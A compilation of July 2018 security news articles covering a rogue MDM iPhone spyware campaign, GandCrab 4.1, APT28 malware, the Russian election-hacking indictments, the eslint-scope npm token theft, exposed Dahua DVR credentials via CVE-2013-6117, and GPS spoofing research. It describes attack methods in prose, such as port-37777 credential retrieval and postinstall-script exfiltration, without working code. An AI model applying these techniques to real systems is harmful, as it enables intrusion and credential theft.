The access to the MDM service used by a company could allow an attacker to control employees’ devices and deploy malware and the targeted devices.

bogus MDM service

“Cisco Talos has identified a highly targeted campaign against 13 iPhones which appears to be focused on India. The attacker deployed an open-source mobile device management (MDM) system to control enrolled devices.” reads the analysis published by Cisco Talos.

“At this time, we don’t know how the attacker managed to enroll the targeted devices. Enrollment could be done through physical access to the devices, or most likely by using social engineering to entice a user to register”

To enroll an iOS device into the MDM service requires a user to manually install enterprise development certificate. Enterprises can obtain such kind of certificates through the Apple Developer Enterprise Program.

Enterprise can deliver MDM configuration file through email or a webpage for over-the-air enrollment service using the Apple Configurator.

“MDM uses the Apple Push Notification Service (APNS) to deliver a wake-up message to a managed device. The device then connects to a predetermined web service to retrieve commands and return results,” reads Apple about MDM.

Cisco’s Talos experts believe that attackers used either social engineering techniques, such as a fake tech support-style call or gaining in some way a physical access to the targeted devices.

The threat actors behind this campaign used the BOptions sideloading technique to inject malicious code to legitimate apps, including the messaging apps WhatsApp and Telegram that were then deployed through the MDM service onto the 13 targeted devices in India.

The BOptions sideloading technique allowed the attacker to inject a dynamic library in the application that implements spyware capabilities. The malicious code allows that attacker of collecting and exfiltrating information from the targeted device, including the phone number, serial number, location, contacts, user’s photos, SMS and Telegram and WhatsApp chat messages.

It is still a mystery how attackers tricked victims into installing a certificate authority on the iPhone and how they added the 13 targeted iPhones into their rogue MDM service.

Exfiltrated data and information about the compromised devices were sent to a remote server located at hxxp[:]//techwach[.]com

Among the tainted apps used by the attackers, there was also PrayTime, an application that notifies users when it is time to pray.

“Talos identified another legitimate app executing malicious code during this campaign in India. PrayTime is used to give the user a notification when it’s time to pray,” continues the analysis.

“The purpose is to download and display specific ads to the user. This app also leverages private frameworks to read the SMS messages on the device it is installed on and uploads these to the C2 server.”

Talos was not able to attribute the attack to a specific actor either which are its motivations, they were only able to find evidence suggesting the attackers were operating from India. Experts noticed that attackers planted a “false flag” by posing as a Russian threat actor.

“The certificate was issued in September 2017 and contains an email address located in Russia. Our investigation suggests that the attacker is not based out of Russia. We assume this is a false flag to point researchers toward the idea of a “classical Russian hacker.” False flags are becoming more common in malware, both sophisticated and simple. It’s an attempt to muddy the waters for the analysts/researchers to direct blame elsewhere.” continues the analysis.

Talos shared its findings with Apple that quickly revoked 3 certificates used in this campaign.

Further details, including IoCs are reported in the analysis shared by Talos.

12 Russian Intel Officers charged of hacking into U.S. Democrats
19.7.2018 securityaffairs BigBrothers

The week closes with the indictment for twelve Russian intelligence officers by a US grand jury. The charges were formulated just three days before President Donald Trump is scheduled to meet with Vladimir Putin.
The special Counsel Robert Mueller, who indicted on February 13 Russians for a massive operation aimed to influence the 2016 Presidential election, now charged 12 Russian intelligence officers working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Deputy Attorney General Rod Rosenstein announced the indictment at a press conference in Washington.

“there’s no allegation in this indictment that any American citizen committed a crime.” said Rosenstein. “the conspirators corresponded with several Americans during the course of the conspiracy through the internet.”

However, “there’s no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers,”

During the news conference, the Deputy Attorney General Rod Rosenstein described the technical details of the operations conducted by the units of Russia’s GRU intelligence agency. The cyberspies stole emails from the Democratic National Committee and Hillary Clinton’s campaign, then leaked them in ways meant to influence the perception of Americans about the Presidential election.

Rosenstein reported a second operation in which the officers targeted the election infrastructure and local election officials. The Russian intelligence set up servers in the U.S. and Malaysia under fake names to run their operations, the agents used payment with cryptocurrency that had been “mined” under their direction.

“The fine details of Russian intelligence operations — the names of officers, the buildings where they worked and the computers they used to run phishing operations and make payments — suggest that prosecutors had an inside view aided by their own or another government’s intelligence apparatus.” reads an article published by Bloomberg.

Rosenstein also remarked that “there’s no allegation that the conspiracy changed the vote count or affected any election result.”

Rosenstein also announced that Trump was informed about the indictment before the announcement and that the timing was determined by “the facts, the evidence, and the law.”

The Deputy Attorney General, confirmed that 11 of the Russians indicted were charged with “conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.”

“One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections,” he added.

“The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016,”

“They also hacked into the computer networks of a congressional campaign committee and a national political committee.”

The minority at the US Government is pressing Trump to cancel the meeting with Putin because he intentionally interfered with the election to help Trump’s presidential campaign.

“These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win,” Senator Chuck Schumer, the Democratic Senate minority leader said in a statement.

“President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won’t interfere in future elections,”

Speaking on Friday, before the indictments were announced, Trump explained that he would ask Putin about the alleged interference of Russian intelligence in the Presidential election.

“I will absolutely, firmly ask the question, and hopefully we’ll have a good relationship with Russia,” Trump told a joint press conference with British Prime Minister Theresa May.

Trump described the Mueller investigation as a “rigged witch hunt,” and added that he has been “tougher on Russia than anybody.”

“We have been extremely tough on Russia,”

Russian intelligence

The White House

At a press conference with U.K. Prime Minister @theresa_may, President @realDonaldTrump made it clear: "We have been far tougher on Russia than anybody."

10:03 PM - Jul 13, 2018
5,186 people are talking about this
Twitter Ads info and privacy
Russian intelligence
Hillary Clinton and Donald Trump are tightening their grips on the Democratic and Republican presidential nominations.

Trump evidently believes that the hostility against Russia is a severe interference with the relationship and the collaboration between the two states.

Russia denies any involvement in the elections, and the Kremlin expelled 60 intelligence officers from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.

No Americans were charged Friday, but the indictment reports unidentified Americans were in contact with the Russian intelligence officers.

According to the indictment, there was at least a person close to the Trump campaign and a candidate for Congress that in contact the Russians officers.

A few days after discovery of GandCrab ransomware ver 4.0, experts found 4.1 version
19.7.2018 securityaffairs

Security experts from Fortinet recently detected a new version of the GandCrab ransomware, ver 4.1, that is being distributed through compromised websites
A few days ago, I wrote about the return of the GandCrab ransomware (v4), a new version appeared in the threat landscape and experts at BleepingComputer first reported it.

GandCrab ransomware is a young threat, it first appeared in the wild early this year, but rapidly evolved and it authors improves it across the months. As of March, the ransomware had infected over 50,000 systems and netted its operators over $600,000 in ransom payments.
Security experts from Fortinet recently detected a new version of the threat, the GandCrab ransomware 4.1 that is being distributed through compromised websites designed to appear like download sites for cracked applications.

As the GandCrab ransomware 4 version, the new variant uses the Salsa2.0 stream cipher to encrypt data instead of the RSA-2048 encryption that was used in early versions of the threat.

The code of the latest variant 4.1 includes a list of websites to which the malware connects to sends data related to the infected machine (i.e. IP address, username, computer name, network domain, and, if present, a list of anti-malware tools on the system).

“Only two days after the release of GandCrab 4.0, FortiGuard Labs found a newer version (v4.1) being distributed using the same method, which is through compromised websites disguised as download sites for cracked applications.” reads the analysis published by Fortinet.

“With this new version, GandCrab has added a network communication tactic that was not observed in the previous version.”

gandcrab ransomware

Why does the new variant send data to a large number of websites?

According to Fortinet, there is no evidence that those websites in the hard-coded list have actually been compromised, this circumstance suggests the authors of the malware are testing the functionality or have put it there as a diversionary tactic.

“However, we found no definitive evidence that the hard-coded websites included in the malware had actually ever been compromised to act as servers or download sites for GandCrab.” continues the analysis.

“Even more curious, the fact is that sending victim information to all live hosts in the list is illogical in a practical sense, given that a single successful send would have been enough for its purposes. With these points in mind, we have started to think that this function is either experimental, or simply there to divert analysis and that the URLs included in the list are just victims of a bad humour.”

The analysis of the ransomware revealed that the GandCrab ransomware 4.1 kills numerous processes that can interfere with the file encryption process. For example, it kills msftesql.exe, sqlagent.exe, oracle.exe, msaccess.exe, powerpnt.exe, and wordpad.exe to encrypt high-value files used by most popular applications, such as Microsoft Office Files, Steam, Oracle, etc.

The experts from Fortinet highlighted that there is no evidence that the GandCrab ransomware 4.1 is also able to spread via SMB shares, such as WannaCry and Petya/NotPetya.

“Over the past few days, numerous reports have been circulating claiming that this version of the GandCrab malware can self-propagate via an “SMB exploit”” continues the analysis.

GandCrab ransomware 4

“However, in spite of this string, we could not find any actual function that resembles the reported exploit capability. (It may also be relevant to report that this string was actually first found in v4.0 and not in v4.1, at least in the samples that we have analysed.) Since this string is not connected to any actual exploit spreading function that we could uncover, it seems much more likely that it is simply referring to the encryption of network shares, and not for any sort of exploit propagation.”

Summarizing the threat continues to evolve, but it can not spread via SMB shares yet.

FBI: Overall BEC/EAC losses between Oct 2013 and May 2018 result in $12 billion
19.7.2018 securityaffairs BigBrothers

The number of business email account (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.
FBI provided further data related to Email Account Compromise, according to the feds, the number of business email account (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.

“Business E-mail Compromise (BEC)/E-mail Account Compromise (EAC) is a sophisticated scam targeting both businesses and individuals performing wire transfer payments.” reads the announcement published by the FBI.

“The scam is frequently carried out when a subject compromises legitimate business e-mail accounts through social engineering or computer intrusion techniques to conduct unauthorized transfers of funds.”

The number of BEC/EAC scams continues to grow and the techniques adopted by scammers are evolving, targeting small, medium, and large business and personal transactions.

Unfortunately, business email compromise (BEC) and email account compromise (EAC) scam losses worldwide increased by 136% from December 2016 to May 2018.
Overall losses between October 2013 and May 2018 result in $12 billion.

According to the FBI, the number of scam incidents in the US was 41,058 resulting in $2.9 billion in losses. Feds highlighted that most of the fraudulent activities leveraged on China and Hong Kong banks as receipt of fraudulent funds.

The authorities observed that banks in the United Kingdom, Mexico, and Turkey have also been identified recently as prominent destinations for fraudulent funds.

“The scam may not always be associated with a request for transfer of funds. A variation of the scam involves compromising legitimate business e-mail accounts and requesting Personally Identifiable Information (PII) or Wage and Tax Statement (W-2) forms for employees,” reads the announcement published by the FBI.

Scammers appear very focused on the organizations in the real estate industry, from 2015 to 2017, there was an increase of 1,100% of BEC/EAC victims.

“Victims most often report a spoofed e-mail being sent or received on behalf of one of these real estate transaction participants with instructions directing the recipient to change the payment type and/or payment location to a fraudulent account. The funds are usually directed to a fraudulent domestic account which quickly disperse through cash or check withdrawals.” continue the announcement.

“The funds may also be transferred to a secondary fraudulent domestic or international account. Funds sent to domestic accounts are often depleted rapidly making recovery difficult.”

Below the BEC/EAC statistics that were shared by the FBI:

Domestic and international incidents: 78,617
Domestic and international exposed dollar loss: $12,536,948,299
The following BEC/EAC statistics were reported in victim complaints where a country was identified to the IC3 from October 2013 to May 2018:
Total U.S. victims: 41,058
Total U.S. victims: $2,935,161,457
Total non-U.S. victims: 2,565
Total non-U.S. exposed dollar loss: $671,915,009
The following BEC/EAC statistics were reported by victims via the financial transaction component of the IC3 complaint form, which became available in June 20163. The following statistics were reported in victim complaints to the IC3 from June 2016 to May 2018:
Total U.S. financial recipients: 19,335
Total U.S. financial recipients: $1,629,975,562
Total non-U.S. financial recipients: 11,452
Total non-U.S. financial recipients exposed dollar loss: $1,690,788,278
According to a report published by TrendMicro published in January 2018, Business Email Compromise (BEC) attacks had surpassed the value of damage to enterprises in the past years and it is estimated that it could reach $ 9 billion dollars in 2018.8.

Trump might ask Putin to extradite the 12 Russian intelligence officers
19.7.2018 securityaffairs BigBrothers

A few hours before the upcoming meeting between Donald Trump and Vladimir Putin, the US President said he might ask the extradition to the US of the 12 Russian intelligence officers accused of being involved in attacks against the 2016 presidential election.
Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he might ask the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Trump will meet with Putin in Finland, despite calls from Democratic lawmakers to cancel the summit in light of indictments.

Journalist asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and the reply was clear

“Well, I might.” Trump said

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Trump confirmed that Russian hackers targeted the 2016 Presidential election, but denied that they supported his campaign, he added that his Republican Party had also been hit by Russian hackers.

“I think the DNC (Democratic National Committee) should be ashamed of themselves for allowing themselves to be hacked,” he said. “They had bad defenses and they were able to be hacked. But I heard they were trying to hack the Republicans too. But — and this may be wrong — but they had much stronger defenses.”

The President blamed the DNC for poor security of its systems.

“The President then placed blame on Democrats for “allowing” the data and security breaches that led to Russia’s tampering in the election, saying the Democratic National Committee was ill-equipped to handle a cyberattack from a foreign actor. The Republican National Committee, on the other hand, had “much better defenses,” Trump claimed.” reported the CNN.
“They were doing whatever it was during the Obama administration,” Trump said of the Russians. “And I heard that they were trying, or people were trying, to hack into the RNC too, the Republican National Committee, but we had much better defenses. I’ve been told that by a number of people, we had much better defenses so they couldn’t. I think the DNC should be ashamed of themselves for allowing themselves to be hacked. They had bad defenses, and they were able to be hacked, but I heard they were trying to hack the Republicans too, but, and this may be wrong, but they had much stronger defenses.”

The attempts of hacking of “old emails” of the Republican National Committee was first reported by the CNN in January last year when it quoted the then-FBI Director James Comey.

Comey told a Senate panel that “old emails” of the Republican National Committee had been the target of hacking, but the material was never publicly released. Comey confirmed that there was no evidence the current RNC or the Trump campaign had been successfully hacked.

Trump admitted that he was going to meet Putin with “low expectations.”

“I’m not going with high expectations,” he added.

“I think it’s a good thing to meet,” he said. “I believe that having a meeting with Chairman Kim was a good thing. I think having meetings with the president of China was a very good thing.”

“I believe it’s really good. So having meetings with Russia, China, North Korea, I believe in it. Nothing bad is going to come out of it, and maybe some good will come out.”

Update CSE Malware ZLab – Operation Roman Holiday – Hunting the Russian APT28
19.7.2018 securityaffairs APT

Researchers from the Z-Lab at CSE Cybsec analyzed a new collection of malware allegedly part of a new espionage campaign conducted by the APT28 group.
It was a long weekend for the researchers from the Z-Lab at CSE Cybsec that completed the analysis a number of payloads being part of a new cyber espionage campaign conducted by the Russian APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy, and Strontium).

Last time experts attributed an ongoing campaign to APT28 was in June, when experts from Palo Alto Networks noticed that the group was using new tools in a recent string of attacks.

Palo Alto Networks explained t the APT group has shifted focus in their interest, from NATO member countries and Ukraine to towards the Middle East and Central Asia.

The researchers observed several attacks leveraging the SPLM and the Zebrocy tool between the second and fourth quarters of 2017 against organizations in Asia. The list of targeted countries included China, Mongolia, South Korea and Malaysia.

While conducting ordinary threat intelligence activities, experts at Z-Lab at CSE Cybsec have recently discovered a new series of malware samples that were submitted to the major online sandboxes.

In particular, they noticed a malware sample submitted to Virus Total that was attributed by some experts to the Russian APT28 group.

The APT28 group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

With the help of the researcher that goes online with the Twitter handle Drunk Binary (@DrunkBinary) researchers from Z-Lab obtained a collection of samples to compare with the one that was uploaded on VirusTotal platform.

The analysis revealed that it was a new variant of the infamous APT28 backdoor tracked as X-Agent, in particular, a new Windows version that appeared in the wild in June,

The attack analyzed CSE Cybsec is multi-stage, the experts discovered an initial dropper malware written in Delphi programming language (a language used by the APT28 group in other campaigns) downloads a second stage payload from the Internet and executes it.

APT28 Roman Holiday.png

The payload communicates to the server using HTTPS protocol, making it impossible to eavesdrop on the malicious traffic it generates.

The experts also analyzed another malicious DLL, apparently unrelated to the previous samples, that presents many similarities with other payloads attributed to the Russian APT group.

This malware immediately caught the attention of the expert because it contacts a C2 with the name “marina-info.net” a clear reference to the Italian Military corp, Marina Militare. This lead them into believing that the malicious code was developed as part of targeted attacks against the Italian Marina Militare, or some other entities associated with it.

This last DLL seems to be completely unconnected with the previous samples, but further investigation leads the experts into believing that it was an additional component used by APT28 in this campaign to compromise the target system.

APT28 has a rich arsenal composed of a large number of modular malware and the dll is the component of the X-Agent dissected by the Z-Lab.

X-Agent is a persistent payload injected into the victim machine that can be compiled for almost any Operating System and can be enhanced by adding new ad-hoc component developed for the specific cyber-attack.

In this case, the component was submitted to online sandboxes while the new campaign was ongoing. The experts cannot exclude that the APT group developed the backdoor to target specific organizations including the Italian Marina Militare or any other subcontractor. In their analysis, the experts were not able to directly connect the malicious dll file to the X-Agent samples, but they believe they are both parts of a well-coordinated surgical attack powered by APT28 tracked by Z-Lab as Roman Holiday because it targeted Italian organizations in the summertime.

The dll that connect to “marina-info.net” might be the last stage-malware that is triggered only when particular conditions occur, for example when the malware infects a system with an IP address belonging to specific ranges.

Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara Rules are available in the report published by researchers at ZLAb.

ZoomEye IoT search engine cached login passwords for tens of thousands of Dahua DVRs
19.7.2018 securityaffairs IoT

A security researcher discovered that the IoT search engine ZoomEye has cached login passwords for tens of thousands of Dahua DVRs.
The IoT search engine ZoomEye has cached login passwords for tens of thousands of Dahua DVRs, the discovery was made by security researcher Ankit Anubhav, Principal Researcher at NewSky Security.

Dahua DVRs

Anubhav explained that the passwords are related to Dahua DVRs running very old firmware that is known to be affected by a five-year-old vulnerability tracked as CVE-2013-6117.

Even if the vulnerability has been patched, many Dahua devices are still running ancient firmware.

The CVE-2013-6117 was discovered by the security expert Jake Reynolds and affects Dahua DVR 2.608.0000.0 and 2.608.GV00.0. The flaw could be exploited by remote attackers to bypass authentication and obtain sensitive information including user credentials, change user passwords, clear log files, and perform other actions via a request to TCP port 37777.

An attacker just needs to initiate a raw TCP connection on a vulnerable Dahua DVR on port 37777 to send the exploit code that triggers the issue.

Once the Dahua device receives this code, it will respond with DDNS credentials for accessing the device, and other data, all in plaintext.

Ankit Anubhav
Just to make things clear to weaponize the exploit, one needs to connect to port 37777 on raw TCP + send the following message to get the ddns creds


Ankit Anubhav
Wow and how did I miss this.
13900+ of these devices have their password as "123456"
Check here https://goo.gl/S5G2Bh #iot #security #fail

This specific case was brought to my attention by another known botnet operator. So again, RIP to these devices. https://twitter.com/ankit_anubhav/status/1017429425602822144 …

11:49 PM - Jul 13, 2018
31 people are talking about this
Twitter Ads info and privacy

Ankit Anubhav
Wow and how did I miss this.
13900+ of these devices have their password as "123456"
Check here https://goo.gl/S5G2Bh #iot #security #fail

This specific case was brought to my attention by another known botnet operator. So again, RIP to these devices.

Ankit Anubhav
Replying to @ankit_anubhav
And of course, people here too have not failed to put extremely generic passwords.https://www.zoomeye.org/searchResult?q=%2Bport%3A%2237777%22%20%22admin123%22 … 270 devices have password as "admin123" lol.

Brickerbot is known to brick the devices he pwns, so it does not look like a happy ending for these devices. @GDI_FDN <end>

8:21 PM - Jul 13, 2018
See Ankit Anubhav's other Tweets
Twitter Ads info and privacy
Anubhav explained that ZoomEye scans port 37777 caching the output in plaintext, this means that everyone that with a ZoomEye account can scrap results to obtain the credentials of tens of thousands

Anubhav notified the issue to ZoomEye asking it to remove the passwords from its cached results, but the expert is still waiting for a reply.

The expert explained that he discovered the issue after reading a post published by the author of the BrickerBot IoT malware that exploited the flaw to hacked hijack and brick Dahua DVRs in the past.

Director of National Intelligence warns of devastating cyber threat to US infrastructure
19.7.2018 securityaffairs BigBrothers

The Director of the National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, he said that “warning lights are blinking red again.”
The Director of National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, he used the following words to express his concerns:

“warning lights are blinking red again”

The U.S. intelligence chief highlighted that computer networks of US government agencies, enterprises, and academic institutions are under incessant attack launched by foreign states.

Russia, North Korea, China, and Iran are the most persistent attacker, the number of their attacks continue to increase and the level of sophistication is growing too.

US infrastructure threat

The Director of National Intelligence believes that Russia is the most aggressive threat actor and recent events demonstrate it. On Friday, the special Counsel Robert Mueller, who indicted on February 13 Russians for a massive operation aimed to influence the 2016 Presidential election, charged 12 Russian intelligence officers working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Of the four, “Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between campaigns launched by China and Russian ones.

According to Coats, China operates with the primary intent on stealing military and industrial secrets and had “capabilities, resources that perhaps Russia doesn’t have.” The Kremlin operated to undermine U.S. values and democratic institutions.

Coats spoke at the Hudson Institute think tank shortly after the announcement of the indictment.

Coats warned of threat a “crippling cyber attack on our critical infrastructure” by a nation state actor is growing.

“Coats said the U.S. government has not yet detected the kinds of cyber attacks and intrusions that officials say Russia launched against state election boards and voter data bases before the 2016 election.” reported the Reuters.

“However, we fully realize that we are just one click away of the keyboard from a similar situation repeating itself,” Coats continued.

He made a parallelism on the current situation in the cyberspace with the “alarming activities” that U.S. intelligence detected before al Qaeda conducted Sept. 11, 2001 attack.

“The system was blinking red. Here we are nearly two decades later and I’m here to say the warning lights are blinking red again,” he said.

While I’m writing, President Donald Trump has arrived at Finland’s Presidential Palace for a summit with Russian President Vladimir Putin.

Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he might ask the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Journalist asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and the reply was clear

“Well, I might.” Trump said

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Coats also mentioned the so-called “troll factory” operated by unnamed “individuals” affiliated with the Internet Research Agency based in the St. Petersburg that was indicted by federal authorities in February.

These individuals have been “creating new social media accounts, masquerading as Americans and then using these accounts to draw attention to divisive issues,” he said.

Code hosting service GitHub can now scan also for vulnerable Python code
19.7.2018 securityaffairs

The code hosting service GitHub added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.
Good news for GitHub users, the platform added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.

In March, the code hosting service GitHub confirmed that the introduction of GitHub security alerts in November allowed obtaining a significant reduction of vulnerable code libraries on the platform.

Github alerts warn developers when including certain flawed software libraries in their projects and provide advice on how to address the issue.

Last year GitHub first introduced the Dependency Graph, a feature that lists all the libraries used by a project. The feature supports JavaScript and Ruby, and the company announced to add the support for Python within the year.

GitHub Security Alerts

The GitHub security alerts feature introduced in November is designed to alert developers when one of their project’s dependencies has known flaws. The Dependency graph and the security alerts feature have been automatically enabled for public repositories, but they are opt-in for private repositories.

The availability of a dependency graph allows notifying the owners of the projects when it detects a known security vulnerability in one of the dependencies and suggests known fixes from the GitHub community.

An initial scan conducted by GitHub revealed more than 4 million vulnerabilities in more than 500,000 repositories. Github notified affected users by December 1, more than 450,000 of the vulnerabilities were addressed either by updating the affected library or removing it altogether.

Vulnerabilities are in a vast majority of cases addressed within a week by active developers.

With the support of a Python language, developers will have the opportunity to receive alerts also for their code written in this powerful programming language.

“We’re pleased to announce that we’ve shipped Python support. As of this week, Python users can now access the dependency graph and receive security alerts whenever their repositories depend on packages with known security vulnerabilities.” reads the announcement published by GitHub quality engineer Robert Schultheis.

“We’ve chosen to launch the new platform offering with a few recent vulnerabilities. Over the coming weeks, we will be adding more historical Python vulnerabilities to our database. Going forward, we will continue to monitor the NVD feed and other sources, and will send alerts on any newly disclosed vulnerabilities in Python packages.”

The company confirmed that the scanner is enabled by default on public repositories, while for private repositories the maintainers need to opt into security alerts, or by giving the dependency graph access to the repo from the “Insights” tab.

“Public repositories will automatically have your dependency graph and security alerts enabled. For private repositories, you’ll need to opt in to security alerts in your repository settings or by allow access in the dependency graph section of your repository’s “Insights” tab.” concludes Schultheis.

“When vulnerability alerts are enabled, admins will receive security alerts by default. Admins can also add teams or individuals as recipients for security alerts by going into their repository’s settings page and navigating to the “Alerts” tab.”

Trump – Putin meeting: “I don’t see any reason” for Russia to interfere with the US presidential election
19.7.2018 securityaffairs BigBrothers

Russian President Vladimir Putin ‘just said it’s not Russia,’ and President Trump believes him.
Today the controversial meeting between Russian President Vladimir Putin and US President Donald Trump was held in Helsinki, but as expected Russian President denied any interference with the 2016 US election.
After the meeting, Putin and Trump made a joint news conference and of course, the US President Trump confirmed its trust in the words of the ally Putin.

“So I have great confidence in my intelligence people, but I will tell you that President Putin was extremely strong and powerful in his denial today,” Trump said.

Special Counsel Robert Mueller has a different opinion about alleged Russia’s interference in the 2016 Presidential election, his investigation led to the indictment of 12 Russian intelligence officials working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

“I don’t see any reason” for Russia to interfere with the US presidential election, this is the Trump’s though.

On Friday, director of national intelligence Daniel R. Coats warned of a devastating cyber threat to US infrastructure, he said that “warning lights are blinking red again.”

The Director of National Intelligence believes that Russia is the most aggressive threat actor and recent events demonstrate it.

“Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between campaigns launched by China and Russian ones.

According to Coats, China operates with the primary intent on stealing military and industrial secrets and had “capabilities, resources that perhaps Russia doesn’t have.” The Kremlin operated to undermine U.S. values and democratic institutions.

“The role of the Intelligence Community is to provide the best information and fact-based assessments possible for the President and policymakers. We have been clear in our assessments of Russian meddling in the 2016 election and their ongoing, pervasive efforts to undermine our democracy, and we will continue to provide unvarnished and objective intelligence in support of our national security,” said Coats in a press statement released after the Trump-Putin press event.

Trump Putin
HELSINKI, FINLAND – JULY 16: U.S. President Donald Trump (L) and Russian President Vladimir Putin answer questions about the 2016 U.S Election collusion during a joint press conference after their summit on July 16, 2018 in Helsinki, Finland. The two leaders met one-on-one and discussed a range of issues including the 2016 U.S Election collusion. (Photo by Chris McGrath/Getty Images)

Below the excerpt from the full transcript from the Helsinki press conference about alleged interference in 2016 Presidential election.

“Once again, President Trump mentioned issue of so-called interference of Russia with the American elections. I had to reiterate things I said several times, including during our personal contacts, that the Russian state has never interfered and is not going to interfere in internal American affairs, including election process. Any specific material, if such things arise, we are ready to analyze together. For instance, we can analyze them through the joint working group on cyber security, the establishment of which we discussed during our previous contacts.” said Putin.

“During today’s meeting, I addressed directly with President Putin the issue of Russian interference in our elections. I felt this was a message best delivered in person. Spent a great deal of time talking about it. And President Putin may very well want to address it and very strongly, because he feels strongly about it and he has an interesting idea. We also discussed one of the most critical challenges facing humanity, nuclear proliferation. I provided an update on my meeting last month with Chairman Kim on the denuclearization of North Korea. After today, I am very sure that President Putin and Russia want very much to end that problem. Going to work with us, and I appreciate that commitment.” said Trump.

Crooks deployed malicious ESLint packages that steal software registry login tokens
19.7.2018 securityaffairs

Hackers compromised the npm account of an ESLint maintainer and published malicious versions of eslint packages to the npm registry.
Crooks compromised an ESLint maintainer’s account last week and uploaded malicious packages that attempted to steal login tokens from the npm software registry. npm is the package manager for JavaScript and the world’s largest software registry.

ESLint is open source “pluggable and configurable linter tool” for identifying and reporting on patterns in JavaScript, it was created by Nicholas Zakas.

The affected packages hosted on npm are:

eslint-scope version 3.7.2 o, a scope analysis library used by older versions of eslint, and the latest versions of babel-eslint and webpack.
eslint-config-eslint version 5.0.2 is a configuration used internally by the ESLint team.
Once the tainted packages are installed, they will download and execute code from pastebin.com that was designed to grab the content of the user’s .npmrc file and send the information to the attacker. This file usually contains access tokens for publishing to npm.

“The attacker modified package.json in both eslint-escope@3.7.2 and eslint-config-eslint@5.0.2, adding a postinstall script to run build.js. This script downloads another script from Pastebin and evals its contents.” wrote Henry Zhu about the eslint-scope attack.

“The script extracts the _authToken from a user’s .npmrc and sends it to histats and statcounter inside the Referer header,”

The packages were quickly removed once they were discovered by maintainers and the content on pastebin.com was taken down.

“On July 12th, 2018, an attacker compromised the npm account of an ESLint maintainer and published malicious versions of the eslint-scope and eslint-config-eslint packages to the npm registry. On installation, the malicious packages downloaded and executed code from pastebin.com which sent the contents of the user’s .npmrc file to the attacker.” reads the security advisory published by ESLint.

“An .npmrc file typically contains access tokens for publishing to npm. The malicious package versions are eslint-scope@3.7.2 and eslint-config-eslint@5.0.2, both of which have been unpublished from npm. The pastebin.com paste linked in these packages has also been taken down.”

ESLint packages

The npm login tokens grabbed by malicious packages don’t include user’s npm password, but npm opted to revoke possibly impacted tokens. Users can revoke existing tokens as suggested by npm.

“We have now invalidated all npm tokens issued before 2018-07-12 12:30 UTC, eliminating the possibility of stolen tokens being used maliciously. This is the final immediate operational action we expect to take today.” reads the npm’s incident report.

Further investigation allowed the maintainers to determine that the account was compromised because the ower had reused the same password on multiple accounts and also didn’t enabled two-factor authentication on their npm account.

ESLint released eslint-scope version 3.7.3 and eslint-config-eslint version 5.0.3.

Users who installed the malicious packages need to update npm.

Researchers show how to manipulate road navigation systems with low-cost devices
19.7.2018 securityaffairs Mobil

Researchers have developed a tool that poses as GPS satellites to deceive nearby GPS receivers and manipulate road navigation systems.
Researchers have developed a tool that poses as GPS satellites to deceive nearby GPS receivers. The kit could be used to deceive receivers used by navigation systems and suggest drivers the wrong direction.

“we explore the feasibility of a stealthy manipulation attack against road navigation systems. The goal is to trigger the fake turn-by-turn navigation to guide the victim to a wrong destination without being noticed.” reads the research paper published by the experts.

“Our key idea is to slightly shift the GPS location so that the fake navigation route matches the shape of the actual roads and trigger physically possible instructions.”

The group of researchers is composed of three teams from Microsoft, Virginia Tech in the US, and the University of Electronic Science and Technology of China.

The boffins were able to spoof packets transmitted by satellites to mobile devices and navigation systems used in the automotive industry.

The tests conducted by experts allowed to remotely change the routes with up to 95 per cent accuracy. The researchers built a radio-transmitting device based on Raspberry Pi, they used just $223 of components.

The radio transmitting device broadcasts fake location data and makes it impossible for the receivers to have the real positioning data from the satellite.

In a Real attack scenario, the device could be used to deceive navigation systems in cars.

navigation systems

“We show that adversaries can build a portable spoofer with low costs (about $223), which can easily penetrate the car body to take control of the GPS navigation system.” continues the paper.

“Our measurement shows that effective spoofing range is 40–50 meters and the target device can consistently latch onto the false signals without losing connections,”

In order to make the attack stealth the researchers experimented with stashing the spoofing device in the trunk of a car or under the back seat.

They were able to add new route details via a cellular network connection without following the target.

In a test in field conducted in a Chinese parking lot, the researchers deceived a navigation system in 48 seconds by hiding the device in the truck, while if it was under the seat, it took just 38 seconds.

The expert used data from OpenStreetMap to construct routes the target.
“Compared to spoofing a drone or a ship, there are unique challenges to manipulate the road navigation systems. First, road navigation attack has strict geographical constraints. It is far more challenging to perform GPS spoofing attacks in real-time while coping with road maps and vehicle speed limits.” continues the paper.

